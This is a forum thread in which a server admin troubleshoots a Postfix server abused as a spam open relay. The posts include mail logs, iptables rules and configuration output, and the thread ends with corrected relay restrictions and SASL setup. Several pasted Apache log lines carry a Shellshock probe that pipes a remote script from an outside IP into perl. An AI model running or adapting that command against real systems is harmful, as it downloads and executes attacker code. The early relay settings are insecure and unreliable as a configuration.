[SOLVED] SMTP under attack. Help?

15 posts / 0 new
Last post
#1 Thu, 10/30/2014 - 16:51
remibruggeman

[SOLVED] SMTP under attack. Help?

Hello,

Since shortly (3 days) I have been the target of a cracker. The attack uses up to now 3 known IP addresses: iptables -I INPUT -s 108.178.61.228 -j DROP #spam iptables -I INPUT -s 108.178.61.229 -j DROP #spam iptables -I INPUT -s 198.143.132.2 -J DROP #spam iptables -I INPUT -s 179.236.124.245 -J DROP #spam

The attacker sends e-mails from his server, uses my server as relay for my own domain and sends it out. I do not understand how the attacker can send e-mails without having to login over SMTP.

An extract from the mail log:

Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: BD9BD58CB46F: from=<hbdbd5@MYDOMAIN.COM>, size=1220, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: 4B18E58DFCD4: removed
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: B733E58C411B: from=<yuehr@MYDOMAIN.COM>, size=1645, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: BC3D858CEB1D: from=<ztjg1ilt@MYDOMAIN.COM>, size=1111, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/error[7917]: 3D29D58D0093: to=<aureliopereira22@hotmail.com>, relay=none, delay=181855, delays=181079/775/0/0.73, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7867]: 3A55158DC324: to=<luan.nextel@hotmail.com>, relay=none, delay=9889, delays=9113/775/0/0.93, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7369]: 36D2A58C839D: to=<eloina_f_silva@hotmail.com>, relay=none, delay=283587, delays=282811/774/0/1.5, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7360]: 3495958C8761: to=<mariasaraiva94@hotmail.com>, relay=none, delay=282674, delays=281898/775/0/0.55, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7392]: 3847E58D6CEB: to=<claysin_bts@hotmail.com>, relay=none, delay=106725, delays=105949/774/0/1.7, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7352]: 3C4DF59222C7: to=<marlon787@hotmail.com>, relay=none, delay=9625, delays=8849/775/0/1.1, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7868]: AACCA5940920: to=<elinewalc@hotmail.com>, relay=none, delay=777, delays=2.2/775/0/0.17, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7916]: C33515940921: to=<cris_sa@hotmail.com>, relay=none, delay=777, delays=2.4/775/0/0.17, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/smtp[7616]: 368C6590406B: to=<mrmarina@uol.com.br>, relay=mx.uol.com.br[200.147.36.15]:25, conn_use=4, delay=33035, delays=32132/902/0.25/0.65, dsn=4.7.1, status=deferred (host mx.uol.com.br[200.147.36.15] said: 450 4.7.1 <mrmarina@uol.com.br>: Recipient address rejected: MX-UOL-04 - Too many messages, try again later. (in reply to RCPT TO command))
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: BD30358CF5A5: from=<a7zbsltj@MYDOMAIN.COM>, size=1160, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: BECAB5924EFE: from=<mxpny9yg@MYDOMAIN.COM>, size=1136, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/smtpd[7903]: warning: restriction `permit_mynetworks' after `permit' is ignored

My server is already being blocked by several blocklists. I have made several changes to the settings and it seems that the attacker is unable to send e-mails now. But on the other hand, I am unable to send e-mail also.

My current biggest concern is: - what is impacted? Only postfix or might other systems be affected also? - how can the attacker send without username and password? - how can I counter this? - any passwords I should change? - Why can't I send? The current logs are like this:

Oct 30 22:43:59 exalt2 postfix/smtpd[18981]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 30 22:43:59 exalt2 postfix/smtpd[18981]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 30 22:44:00 exalt2 postfix/smtpd[18981]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 30 22:44:00 exalt2 postfix/smtpd[18981]: disconnect from unknown[179.236.124.245]
Oct 30 22:44:09 exalt2 postfix/smtpd[18309]: connect from static.240.54.251.148.clients.your-server.de[148.251.54.240]
Oct 30 22:44:09 exalt2 postfix/smtpd[18309]: disconnect from static.240.54.251.148.clients.your-server.de[148.251.54.240]
Oct 30 22:45:09 exalt2 postfix/smtpd[18309]: connect from static.240.54.251.148.clients.your-server.de[148.251.54.240]
Oct 30 22:45:09 exalt2 postfix/smtpd[18309]: disconnect from static.240.54.251.148.clients.your-server.de[148.251.54.240]
Oct 30 22:45:12 exalt2 postfix/smtpd[18981]: connect from MY.REVERSE.DOMAIN[my.home.ip]
Oct 30 22:45:13 exalt2 postfix/smtpd[18981]: warning: support for restriction "check_relay_domains" will be removed from Postfix; use "reject_unauth_destination" instead
Oct 30 22:45:13 exalt2 postfix/smtpd[18981]: NOQUEUE: reject: RCPT from MY.REVERSE.DOMAIN[my.home.ip]: 554 5.7.1 <XXXXXX@gmail.com>: Recipient address rejected: Relay access denied; from=<remi@MYDOMAIN.COM> to=<XXXXXX@gmail.com> proto=ESMTP helo=<[192.168.3.100]>
Oct 30 22:45:13 exalt2 postfix/smtpd[18981]: disconnect from MY.REVERSE.DOMAIN[my.home.ip]

Any help is greatly appreciated!

Thu, 10/30/2014 - 17:14
remibruggeman

At the moment I am not receiving logs anymore of spam being sent. The only thing I still see is this:

Oct 30 23:04:15 exalt2 postfix/smtpd[22637]: warning: 179.236.124.245: hostname 179236124245.user.veloxzone.com.br verification failed: Name or service not known
Oct 30 23:04:15 exalt2 postfix/smtpd[22637]: connect from unknown[179.236.124.245]
Oct 30 23:04:16 exalt2 postfix/smtpd[22637]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 30 23:04:16 exalt2 postfix/smtpd[22637]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 30 23:04:17 exalt2 postfix/smtpd[22637]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 30 23:04:17 exalt2 postfix/smtpd[22637]: disconnect from unknown[179.236.124.245]

I still do not understand however what I did that makes them unable to send. "Cannot find your hostname" does that mean that any user on my server without a hostname would also be refused? How likely is this? How can I still improve security?

Thu, 10/30/2014 - 17:25
remibruggeman

Is there a way I can easily activate the following option: #relay_recipient_maps = hash:/etc/postfix/relay_recipients If possible that Virtualmin would dynamically add new created mailboxes, that would be great ...

----edit

I found that there is such a list: /etc/postfix/virtual I will enable the following command in the /etc/postfix/main.cf: relay_recipient_maps = hash:/etc/postfix/virtual

Fri, 10/31/2014 - 10:31
andreychek

Howdy,

If you have any of those emails in your queue, you may want to review the email headers to get a better idea of what's going on and how they're getting in there.

It should not be possible to relay emails through your server, unless someone has guessed a password of one of your users.

Another option is that they could be accessing your server via a website containing a vulnerability of some sort.

What is the output of the command "postconf -n"? We can review that to see if there is anything unusual or insecure regarding your server's Postfix installation (feel free to edit out your actual domain names).

-Eric

Fri, 10/31/2014 - 15:26
remibruggeman

Hey Eric,

Thanks again for your reply. Is it possible for an attacker to get the password due to the recent poodlebleed technique? How can I verify with which account the attacker attempts to log in? I emptied the whole queue, so there are no more malicious e-mails in there, but I see I am still getting plenty attempts, even though I blocked the IP's in the iptables.

Oct 31 21:00:13 exalt2 postfix/smtpd[9920]: warning: 179.236.124.245: hostname 179236124245.user.veloxzone.com.br verification failed: Name or service not known
Oct 31 21:00:13 exalt2 postfix/smtpd[9920]: connect from unknown[179.236.124.245]
Oct 31 21:00:14 exalt2 postfix/smtpd[9920]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 31 21:00:14 exalt2 postfix/smtpd[9920]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 31 21:00:15 exalt2 postfix/smtpd[9920]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 31 21:00:15 exalt2 postfix/smtpd[9920]: disconnect from unknown[179.236.124.245]

In the secure log I see this a lot:

Oct 31 21:00:04 SERVER su: PAM unable to dlopen(/lib64/security/pam_fprintd.so): /lib64/security/pam_fprintd.so: cannot open shared object file: No such file or directory
Oct 31 21:00:04 SERVER su: PAM adding faulty module: /lib64/security/pam_fprintd.so
Oct 31 21:00:04 SERVER su: pam_unix(su:session): session opened for user postgres by (uid=0)
Oct 31 21:00:04 SERVER su: pam_unix(su:session): session closed for user postgres
Oct 31 21:00:04 SERVER su: PAM unable to dlopen(/lib64/security/pam_fprintd.so): /lib64/security/pam_fprintd.so: cannot open shared object file: No such file or directory
Oct 31 21:00:04 SERVER su: PAM adding faulty module: /lib64/security/pam_fprintd.so
Oct 31 21:00:04 SERVER su: pam_unix(su:session): session opened for user postgres by (uid=0)
Oct 31 21:00:04 SERVER su: pam_unix(su:session): session closed for user postgres

Could this be related?

In the apache logs I see no POSTS (is this logged by default?) I only see failed attacks:

[Sun Oct 26 23:54:42 2014] [error] [client 95.183.244.244] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Mon Oct 27 00:58:49 2014] [error] [client 46.4.97.132] File does not exist: /var/www/html/cgi-sys, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Mon Oct 27 00:58:49 2014] [error] [client 46.4.97.132] File does not exist: /var/www/html/cgi-sys, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Mon Oct 27 00:58:49 2014] [error] [client 46.4.97.132] File does not exist: /var/www/html/xul, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Mon Oct 27 00:58:49 2014] [error] [client 46.4.97.132] script not found or unable to stat: /var/www/cgi-bin/status, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Mon Oct 27 07:51:39 2014] [error] [client 216.24.87.106] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /tmUnblock.cgi
[Mon Oct 27 17:55:39 2014] [error] [client 76.168.154.151] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /tmUnblock.cgi
[Mon Oct 27 21:16:18 2014] [error] [client 211.24.26.250] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /tmUnblock.cgi
[Mon Oct 27 22:47:17 2014] [error] [client 8.17.32.62] File does not exist: /var/www/html/recordings
[Tue Oct 28 02:43:12 2014] [error] [client 50.152.10.61] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /tmUnblock.cgi
[Tue Oct 28 03:51:09 2014] [error] [client 31.222.163.233] File does not exist: /var/www/html/cgi-bin-sdb, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Tue Oct 28 03:51:09 2014] [error] [client 31.222.163.233] File does not exist: /var/www/html/cgi-mod, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Tue Oct 28 03:51:09 2014] [error] [client 31.222.163.233] File does not exist: /var/www/html/cgi-sys, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Tue Oct 28 03:51:09 2014] [error] [client 31.222.163.233] File does not exist: /var/www/html/cgi-sys, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
body.xml:1: parser error : Document labelled UTF-16 but has UTF-8 content
<?xml version="1.0" encoding="utf-16" standalone="yes"?>
                                     ^
...
[Thu Oct 30 22:59:32 2014] [error] [client 125.64.35.67] File does not exist: /var/www/html/zc
[Thu Oct 30 23:04:26 2014] [error] [client 88.6.208.233] File does not exist: /var/www/html/riri
[Thu Oct 30 23:04:26 2014] [error] [client 88.6.208.233] File does not exist: /var/www/html/phpMyAdmin
[Thu Oct 30 23:04:26 2014] [error] [client 88.6.208.233] File does not exist: /var/www/html/pma
[Thu Oct 30 23:04:26 2014] [error] [client 88.6.208.233] File does not exist: /var/www/html/myadmin

(isn't there a possibility to create an automated blocklist in the iptables for IP's that attempt to execute files in the /var/www/html dir?)

The output:

 postconf -n
alias_database = hash:/etc/aliases
alias_maps = hash:/etc/aliases
allow_percent_hack = no
broken_sasl_auth_clients = yes
command_directory = /usr/sbin
config_directory = /etc/postfix
daemon_directory = /usr/libexec/postfix
data_directory = /var/lib/postfix
debug_peer_level = 2
disable_vrfy_command = yes
home_mailbox = Maildir/
html_directory = no
inet_interfaces = all
inet_protocols = ipv4
mail_owner = postfix
mailbox_command = /usr/bin/procmail-wrapper -o -a $DOMAIN -d $LOGNAME
mailbox_size_limit = 0
mailq_path = /usr/bin/mailq.postfix
manpage_directory = /usr/share/man
mydestination = $myhostname, localhost.$mydomain, localhost, MY.DOMAIN.COM
newaliases_path = /usr/bin/newaliases.postfix
queue_directory = /var/spool/postfix
readme_directory = /usr/share/doc/postfix-2.6.6/README_FILES
relay_recipient_maps = hash:/etc/postfix/virtual
sample_directory = /usr/share/doc/postfix-2.6.6/samples
sender_bcc_maps = hash:/etc/postfix/bcc
sendmail_path = /usr/sbin/sendmail.postfix
setgid_group = postdrop
smtpd_banner = smtp
smtpd_helo_required = yes
smtpd_recipient_restrictions = reject_rbl_client zen.spamhaus.org permit_mynetworks permit reject_unauth_destination
smtpd_sasl_auth_enable = yes
smtpd_sender_restrictions = reject_unknown_client reject_invalid_hostname reject_unknown_sender_domain
smtpd_tls_CAfile = /etc/postfix/postfix.ca.pem
smtpd_tls_auth_only = yes
smtpd_tls_cert_file = /etc/postfix/postfix.cert.pem
smtpd_tls_key_file = /etc/postfix/postfix.key.pem
smtpd_tls_mandatory_ciphers = high
smtpd_tls_mandatory_protocols = !SSLv2, !SSLv3
smtpd_tls_security_level = may
unknown_local_recipient_reject_code = 550
virtual_alias_maps = hash:/etc/postfix/virtual
Sat, 01/31/2015 - 12:24
Welshman
Welshman's picture

Probably been hacked and a file put on server, had a client recently with a footer.php file suddenly appear in a WP tinymce folder. Check the headers if a you can see where the generated mail is coming from.

Chaos Reigns Within, Reflect, Repent and Reboot, Order Shall Return.

Sun, 11/02/2014 - 12:16
remibruggeman

Hello Welschman, It is possible, but I doubt that. The mails are being sent from another server to my smtp server. The mails are not locally created. I am also running 2 file integrety checks, rkhunter, lmd and cfs. I had no messages. where as I used to get these kind of attacks, and they were spotted very rapidly...

Tue, 11/04/2014 - 13:10
remibruggeman

It's happening again :( These are the headers:

Mail headers
View basic headers
Received
from TARWADAEX (mail.Sheffield.ae [91.73.219.154]) by MY.DOMAIN.COM (Postfix) with ESMTP id C167E58C06D8 for <joneslarry481@gmail.com>; Tue, 4 Nov 2014 18:23:03 +0100 (CET)
MIME-Version
1.0
From
admin@goodservers.com
To
joneslarry481@gmail.com
Date
4 Nov 2014 21:34:04 +0400
Subject
144.76.127.234,mail,mail

The following showed in the logs:

Nov  4 19:58:03 exalt2 postfix/smtpd[15978]: connect from mail.tarwada.ae[91.73.219.154]
Nov  4 19:58:03 exalt2 postfix/smtpd[15978]: warning: restriction `reject_unauth_destination' after `permit' is ignored
Nov  4 19:58:04 exalt2 postfix/smtpd[15978]: 007D458C01BC: client=mail.tarwada.ae[91.73.219.154]
Nov  4 19:58:05 exalt2 postfix/smtpd[15996]: connect from mail.Sheffield.ae[91.73.219.154]
Nov  4 19:58:05 exalt2 postfix/smtpd[15996]: lost connection after CONNECT from mail.Sheffield.ae[91.73.219.154]
Nov  4 19:58:05 exalt2 postfix/smtpd[15996]: disconnect from mail.Sheffield.ae[91.73.219.154]
Nov  4 19:58:06 exalt2 postfix/smtpd[15996]: connect from mail.tarwada.ae[91.73.219.154]
Nov  4 19:58:07 exalt2 postfix/smtpd[15996]: warning: restriction `reject_unauth_destination' after `permit' is ignored
Nov  4 19:58:07 exalt2 postfix/smtpd[15996]: EAA2958C1317: client=mail.tarwada.ae[91.73.219.154]
Nov  4 19:58:09 exalt2 postfix/cleanup[16005]: EAA2958C1317: message-id=<>
Nov  4 19:58:09 exalt2 postfix/qmgr[31563]: EAA2958C1317: from=<admin@goodservers.com>, size=348, nrcpt=1 (queue active)
Nov  4 19:58:11 exalt2 postfix/smtp[16008]: EAA2958C1317: host gmail-smtp-in.l.google.com[64.233.161.27] said: 421-4.7.0 [XXX.XXX.XXX.XXX      15] Our system has detected an unusual rate of 421-4.7.0 unsolicited mail originating from your IP address. To protect our 421-4.7.0 users from spam, mail sent from your IP address has been temporarily 421-4.7.0 rate limited. Please visit 421-4.7.0 http://www.google.com/mail/help/bulk_mail.html to review our Bulk 421 4.7.0 Email Senders Guidelines. qi2si2225793lbb.47 - gsmtp (in reply to end of DATA command)
Nov  4 19:58:13 exalt2 postfix/smtp[16008]: EAA2958C1317: to=<joneslarry481@gmail.com>, relay=alt1.gmail-smtp-in.l.google.com[64.233.168.27]:25, delay=5.3, delays=1.6/0.01/2.6/1, dsn=4.7.0, status=deferred (host alt1.gmail-smtp-in.l.google.com[64.233.168.27] said: 421-4.7.0 [XXX.XXX.XXX.XXX      15] Our system has detected an unusual rate of 421-4.7.0 unsolicited mail originating from your IP address. To protect our 421-4.7.0 users from spam, mail sent from your IP address has been temporarily 421-4.7.0 rate limited. Please visit 421-4.7.0 http://www.google.com/mail/help/bulk_mail.html to review our Bulk 421 4.7.0 Email Senders Guidelines. pn6si1418211obb.17 - gsmtp (in reply to end of DATA command))
Nov  4 19:58:14 exalt2 postfix/cleanup[15995]: 007D458C01BC: message-id=<20141104225804.16907@localhost.localdomain>
Nov  4 19:58:14 exalt2 postfix/qmgr[31563]: 007D458C01BC: from=<admin@goodservers.com>, size=406, nrcpt=1 (queue active)
Nov  4 19:58:16 exalt2 postfix/smtp[16008]: 007D458C01BC: to=<joneslarry481@gmail.com>, relay=gmail-smtp-in.l.google.com[64.233.161.27]:25, delay=13, delays=11/0/0.17/2.1, dsn=2.0.0, status=sent (250 2.0.0 OK 1415127496 oi5si2023651lbb.135 - gsmtp)
Nov  4 19:58:16 exalt2 postfix/qmgr[31563]: 007D458C01BC: removed
Nov  4 19:58:56 exalt2 postfix/smtpd[15996]: disconnect from mail.tarwada.ae[91.73.219.154]
Nov  4 19:58:56 exalt2 postfix/smtpd[15978]: disconnect from mail.tarwada.ae[91.73.219.154]

I really need to stop these attacks. Any help is very welcome! How can they log in? How can they even send? I set the "Map for allowed addresses for relaying" to hash:/etc/postfix/virtual. This way it should only allow to send mail from e-mail accounts which were created on the mail server...

Tue, 11/04/2014 - 13:30
remibruggeman

according to the MX Toolbox my postfix 'might' be setup as an open relay. How can I make it a closed relay?

Tue, 11/04/2014 - 13:52
remibruggeman

I tried to add the following parameters to main.cf: smtpd_sasl_security_options = noanonymous smtpd_sasl_tls_security_options = noanonymous smtpd_sasl_type = dovecot smtpd_sender_restrictions =permit_sasl_authenticated

However, Then I get the following error in the log:

Nov  4 20:45:42 exalt2 postfix/smtpd[21660]: warning: SASL: Connect to smtpd failed: No such file or directory
Nov  4 20:45:42 exalt2 postfix/smtpd[21660]: fatal: no SASL authentication mechanisms
Nov  4 20:45:43 exalt2 postfix/master[21629]: warning: process /usr/libexec/postfix/smtpd pid 21660 exit status 1
Nov  4 20:45:43 exalt2 postfix/master[21629]: warning: /usr/libexec/postfix/smtpd: bad command startup -- throttling

How should I interpret this? Is SASL not running or not configured? I am lost.

Tue, 11/04/2014 - 14:04
andreychek

What you may want to try is go back to a basic/standard "smtpd_recipient_restrictions" line, and see if that resolves the issue. If so, then you can make some tweaks to it to harden it up a bit. But I'm wondering if your current smtpd_recipient_restrictions line is allowing relaying through your system.

My suggestion would be to replace you current line with this one, and then restart Postfix:

smtpd_recipient_restrictions = permit_mynetworks permit_sasl_authenticated reject_unauth_destination

Tue, 11/04/2014 - 14:45
remibruggeman

Hey Erik,

My restrictions is: smtpd_recipient_restrictions = reject_rbl_client zen.spamhaus.org permit_mynetworks permit reject_unauth_destination permit_sasl_authenticated

I removed the "permit" but then I'm not allowed to send:

Nov  4 21:40:10 exalt2 postfix/smtpd[30289]: connect from XX.XX.XX.XX.access.reverse.ip[xx.xx.xx.xx]
Nov  4 21:40:11 exalt2 postfix/smtpd[30289]: NOQUEUE: reject: RCPT from XX.XX.XX.XX.access.reverse.ip[xx.xx.xx.xx]: 554 5.7.1 <destination@gmail.com>: Relay access denied; from=<origin@MYDOMAIN.COM> to=<destination@gmail.com> proto=ESMTP helo=<[192.168.3.100]>
Nov  4 21:40:11 exalt2 postfix/smtpd[30289]: disconnect from XX.XX.XX.XX.access.reverse.ip[xx.xx.xx.xx]

I don't see why the relay access has been denied though...

Fri, 11/07/2014 - 03:36
remibruggeman

okay, I am a bit further now I think. I removed the "permit" and I am still able to send from my webmail. SMTP does not work yet though. I noted there is no such file or directory: /var/spool/postfix/private/auth The lowest I could go was /var/spool/postfix/private/. Could this be an indication to the problem?

Fri, 11/07/2014 - 04:20
remibruggeman

Great, so it appears I got sals working with following :

/etc/dovecot/conf.d/10-master.conf
for line
 
unix_listener private/auth
change it to
 
unix_listener /var/spool/postfix/private/auth
Restart dovecot and try again.

However, I am still having problems: I can send from the webmail, but it refuses to send from smtp. logs added:

##### via smtp:
Nov  7 11:11:56 exalt2 postfix/smtpd[8307]: connect from XX.XX.XX.XX.my.reverse.ip[XX.XX.XX.XX]
Nov  7 11:11:56 exalt2 postfix/smtpd[8307]: NOQUEUE: reject: RCPT from XX.XX.XX.XX.my.reverse.ip[XX.XX.XX.XX]: 554 5.7.1 <destination@gmail.com>: Recipient address rejected: Relay access denied; from=<username@MYDOMAIN.COM> to=<destination@gmail.com> proto=ESMTP helo=<[192.168.3.100]>
Nov  7 11:11:56 exalt2 postfix/smtpd[8307]: warning: restriction `permit_mynetworks' after `check_relay_domains' is ignored
Nov  7 11:11:56 exalt2 postfix/smtpd[8307]: disconnect from XX.XX.XX.XX.my.reverse.ip[XX.XX.XX.XX]
 
##### Via webmail:
Nov  7 11:12:38 exalt2 postfix/smtpd[8307]: connect from localhost[127.0.0.1]
Nov  7 11:12:38 exalt2 postfix/smtpd[8307]: warning: restriction `permit_mynetworks' after `check_relay_domains' is ignored
Nov  7 11:12:38 exalt2 postfix/smtpd[8307]: 5188B58C069E: client=localhost[127.0.0.1], sasl_method=LOGIN, sasl_username=username.virtualServerAccountName
Nov  7 11:12:38 exalt2 postfix/cleanup[8585]: 5188B58C069E: message-id=<b55cf923eff6614e0e255a9897dbfd0a@MYDOMAIN.COM>
Nov  7 11:12:38 exalt2 postfix/qmgr[8222]: 5188B58C069E: from=<username@MYDOMAIN.COM>, size=1414, nrcpt=1 (queue active)
Nov  7 11:12:38 exalt2 postfix/smtpd[8307]: disconnect from localhost[127.0.0.1]
Nov  7 11:12:39 exalt2 postfix/smtp[8587]: 5188B58C069E: to=<destination@gmail.com>, relay=gmail-smtp-in.l.google.com[173.194.65.26]:25, delay=1, delays=0.2/0.01/0.18/0.61, dsn=2.0.0, status=sent (250 2.0.0 OK 1415355159 wo10si14454591wjc.32 - gsmtp)
Nov  7 11:12:39 exalt2 postfix/qmgr[8222]: 5188B58C069E: removed
Fri, 11/07/2014 - 05:24
remibruggeman

Great. I found the problem.

Apparently it is an issue in which order you put the parameters for smtpd_recipient_restrictions and smtpd_sender_restrictions. These are my current and work:

smtpd_sender_restrictions = permit_mynetworks permit_sasl_authenticated reject_unknown_client, reject_invalid_hostname, reject_unknown_sender_domain, reject_unlisted_sender smtpd_recipient_restrictions = permit_mynetworks permit_sasl_authenticated reject_rbl_client zen.spamhaus.org reject_unauth_destination

This is my postconf -n:

# postconf -n
alias_database = hash:/etc/aliases
alias_maps = hash:/etc/aliases
allow_percent_hack = no
broken_sasl_auth_clients = yes
command_directory = /usr/sbin
config_directory = /etc/postfix
daemon_directory = /usr/libexec/postfix
data_directory = /var/lib/postfix
debug_peer_level = 2
disable_vrfy_command = yes
home_mailbox = Maildir/
html_directory = no
inet_interfaces = all
inet_protocols = ipv4
mail_owner = postfix
mailbox_command = /usr/bin/procmail-wrapper -o -a $DOMAIN -d $LOGNAME
mailbox_size_limit = 0
mailq_path = /usr/bin/mailq.postfix
manpage_directory = /usr/share/man
mydestination = $myhostname, localhost.$mydomain, localhost, MY.DOMAIN.COM
newaliases_path = /usr/bin/newaliases.postfix
queue_directory = /var/spool/postfix
readme_directory = /usr/share/doc/postfix-2.6.6/README_FILES
relay_recipient_maps = hash:/etc/postfix/virtual
sample_directory = /usr/share/doc/postfix-2.6.6/samples
sender_bcc_maps = hash:/etc/postfix/bcc
sendmail_path = /usr/sbin/sendmail.postfix
setgid_group = postdrop
smtpd_banner = smtp
smtpd_recipient_restrictions = permit_mynetworks permit_sasl_authenticated reject_rbl_client zen.spamhaus.org reject_unauth_destination
smtpd_sasl_auth_enable = yes
smtpd_sasl_path = private/auth
smtpd_sasl_type = dovecot
smtpd_sender_restrictions = permit_mynetworks permit_sasl_authenticated reject_unknown_client, reject_invalid_hostname, reject_unknown_sender_domain, reject_unlisted_sender
smtpd_tls_CAfile = /etc/postfix/postfix.ca.pem
smtpd_tls_auth_only = yes
smtpd_tls_cert_file = /etc/postfix/postfix.cert.pem
smtpd_tls_key_file = /etc/postfix/postfix.key.pem
smtpd_tls_mandatory_ciphers = high
smtpd_tls_security_level = may
unknown_local_recipient_reject_code = 550
virtual_alias_maps = hash:/etc/postfix/virtual
Topic locked